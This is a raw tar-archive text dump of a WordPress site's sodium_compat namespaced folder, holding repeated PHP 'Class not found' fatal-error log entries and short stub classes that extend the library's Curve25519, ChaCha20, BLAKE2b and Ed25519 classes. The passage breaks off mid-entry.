[12-Sep-2022 17:15:04 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [15-Sep-2022 09:49:41 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [18-Sep-2022 21:48:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [01-Oct-2022 16:02:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [10-Oct-2022 05:23:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [15-Oct-2022 13:27:03 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [18-Oct-2022 07:54:43 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [06-Nov-2022 15:04:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [08-Nov-2022 22:21:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [11-Nov-2022 17:03:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [12-Nov-2022 03:45:12 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [20-Nov-2022 15:21:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [29-Nov-2022 04:06:46 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [29-Nov-2022 09:52:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [14-Dec-2022 07:25:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [06-Jan-2023 17:47:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [16-Jan-2023 01:59:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [27-Jan-2023 01:33:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [03-Feb-2023 04:08:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [20-Mar-2023 22:27:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [22-Mar-2023 09:22:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [23-Mar-2023 15:10:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [02-Apr-2023 03:50:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [08-Apr-2023 18:34:53 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [15-Apr-2023 19:20:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [06-May-2023 09:23:04 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [16-Jun-2023 00:31:41 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [14-Jul-2023 13:27:36 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [20-Jul-2023 09:00:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [21-Jul-2023 08:46:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [29-Jul-2023 00:21:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [07-Aug-2023 21:03:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [08-Aug-2023 08:16:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [13-Aug-2023 16:49:44 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [19-Aug-2023 16:59:50 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [20-Aug-2023 21:57:41 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 namespaced/Core/Curve25519/Ge/P1p1.php 0000644 00000000170 15057664256 0013031 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519\Ge; class P1p1 extends \ParagonIE_Sodium_Core_Curve25519_Ge_P1p1 { } namespaced/Core/Curve25519/Ge/P2.php 0000644 00000000164 15057664256 0012574 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519\Ge; class P2 extends \ParagonIE_Sodium_Core_Curve25519_Ge_P2 { } namespaced/Core/Curve25519/H.php 0000644 00000000154 15057664256 0012146 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519; class H extends \ParagonIE_Sodium_Core_Curve25519_H { } namespaced/Core/Curve25519/error_log 0000644 00000023167 15057664256 0013174 0 ustar 00 [07-Aug-2021 05:26:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [08-Aug-2021 22:52:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [06-Oct-2021 22:54:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [05-Dec-2021 00:19:45 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [12-Feb-2022 10:14:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [16-Feb-2022 19:08:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [12-Mar-2022 02:09:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [14-Apr-2022 18:31:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [11-May-2022 14:42:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [29-May-2022 06:01:15 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [01-Jul-2022 14:38:15 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [26-Jul-2022 18:35:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [11-Sep-2022 16:58:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [14-Sep-2022 13:22:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [18-Sep-2022 12:59:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [20-Sep-2022 09:17:26 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [02-Dec-2022 07:58:38 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [04-Dec-2022 00:25:45 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [27-Jan-2023 10:53:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [01-Feb-2023 05:34:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [12-Mar-2023 03:12:28 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [17-Jun-2023 03:20:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [26-Jun-2023 21:36:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [08-Jul-2023 16:51:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [15-Jul-2023 05:49:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [17-Jul-2023 23:15:41 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [28-Jul-2023 22:53:04 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 [06-Aug-2023 08:19:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_H' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php on line 4 [07-Aug-2023 05:34:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Fe' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php on line 4 namespaced/Core/Curve25519/Fe.php 0000644 00000000156 15057664256 0012313 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519; class Fe extends \ParagonIE_Sodium_Core_Curve25519_Fe { } namespaced/Core/BLAKE2b.php 0000644 00000000142 15057664256 0011324 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class BLAKE2b extends \ParagonIE_Sodium_Core_BLAKE2b { } namespaced/Core/Ed25519.php 0000644 00000000142 15057664256 0011220 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class Ed25519 extends \ParagonIE_Sodium_Core_Ed25519 { } namespaced/Core/XChaCha20.php 0000644 00000000146 15057664256 0011667 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class XChaCha20 extends \ParagonIE_Sodium_Core_XChaCha20 { } namespaced/Core/ChaCha20/Ctx.php 0000644 00000000154 15057664256 0012274 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\ChaCha20; class Ctx extends \ParagonIE_Sodium_Core_ChaCha20_Ctx { } namespaced/Core/ChaCha20/IetfCtx.php 0000644 00000000164 15057664256 0013105 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\ChaCha20; class IetfCtx extends \ParagonIE_Sodium_Core_ChaCha20_IetfCtx { } namespaced/Core/ChaCha20/error_log 0000644 00000032126 15057664256 0012746 0 ustar 00 [07-Aug-2021 05:31:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [12-Aug-2021 07:16:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [21-Nov-2021 02:03:29 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [28-Nov-2021 05:23:36 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [29-Nov-2021 08:20:27 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [29-Nov-2021 22:34:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [01-Dec-2021 03:13:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [20-Dec-2021 20:19:28 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [01-Jan-2022 05:30:44 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [01-Feb-2022 01:56:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in 